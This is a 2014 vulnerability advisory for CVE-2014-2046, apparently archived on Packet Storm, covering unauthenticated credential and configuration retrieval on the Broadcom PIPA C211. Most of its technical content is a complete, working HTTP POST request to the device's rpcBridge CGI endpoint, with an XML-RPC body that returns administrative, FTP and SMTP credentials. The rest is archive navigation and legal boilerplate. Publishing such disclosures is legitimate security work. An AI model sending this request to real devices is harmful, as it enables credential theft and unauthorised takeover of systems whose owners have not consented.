what you don't know can hurt you

Broadcom PIPA C211 Information Disclosure

Broadcom PIPA C211 Information Disclosure
Posted May 13, 2014
Authored by Jerzy Kramarz

Broadcom PIPA C211 suffers from credential and information disclosure vulnerabilities.

tags | exploit, vulnerability, bypass, info disclosure
advisories | CVE-2014-2046
MD5 | ec2d4cb19a0513544d46d1327686a2d1

Broadcom PIPA C211 Information Disclosure

Change Mirror Download
Vulnerability title: Unauthenticated Credential And Configuration
Retrieval In Broadcom Ltd PIPA C211
CVE: CVE-2014-2046
Vendor: Broadcom Ltd
Product: PIPA C211
Affected version: Soft Rev: SR1.1, HW Rev: PIPA C211 rev2
Fixed version: N/A
Reported by: Jerzy Kramarz

Details:

By sending the following request to the BROADCOM PIPA C211 web interface it is possible to retrieve complete system configuration including administrative credentials, SMTP community strings, FTP upload credentials and all other system user credentials:

POST /cgi-bin/rpcBridge HTTP/1.1
Host: <IP>
Proxy-Connection: keep-alive
Content-Length: 574
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.102 Safari/537.36
Origin: http://<IP>
Content-Type: text/xml
Accept: */*
DNT: 1
Referer: http://:<IP>/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8,es;q=0.6,pl;q=0.4

<methodCall><methodName>config.getValuesHashExcludePaths</methodName><params><param><value><string>sys</string></value></param><param><value><int>0</int></value></param><param><value><int>0</int></value></param><param><value><array><data><value><string>sys.applications.aptcodec.horizonnextgen.status</string></value><value><string>sys.applications.aptcodec.horizonnextgen.configuration</string></value></data></array></value></param></params></methodCall>



Further details at:
https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2046/


Copyright:
Copyright (c) Portcullis Computer Security Limited 2014, All rights
reserved worldwide. Permission is hereby granted for the electronic
redistribution of this information. It is not to be edited or altered in
any way without the express written consent of Portcullis Computer
Security Limited.

Disclaimer:
The information herein contained may change without notice. Use of this
information constitutes acceptance for use in an AS IS condition. There
are NO warranties, implied or otherwise, with regard to this information
or its use. Any use of this information is at the user's risk. In no
event shall the author/distributor (Portcullis Computer Security
Limited) be held liable for any damages whatsoever arising out of or in
connection with the use or spread of this information.


Login or Register to add favorites

File Archive:

September 2021

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    14 Files
  • 2
    Sep 2nd
    19 Files
  • 3
    Sep 3rd
    9 Files
  • 4
    Sep 4th
    1 Files
  • 5
    Sep 5th
    2 Files
  • 6
    Sep 6th
    3 Files
  • 7
    Sep 7th
    12 Files
  • 8
    Sep 8th
    22 Files
  • 9
    Sep 9th
    17 Files
  • 10
    Sep 10th
    19 Files
  • 11
    Sep 11th
    3 Files
  • 12
    Sep 12th
    2 Files
  • 13
    Sep 13th
    15 Files
  • 14
    Sep 14th
    16 Files
  • 15
    Sep 15th
    15 Files
  • 16
    Sep 16th
    7 Files
  • 17
    Sep 17th
    13 Files
  • 18
    Sep 18th
    2 Files
  • 19
    Sep 19th
    2 Files
  • 20
    Sep 20th
    14 Files
  • 21
    Sep 21st
    20 Files
  • 22
    Sep 22nd
    28 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close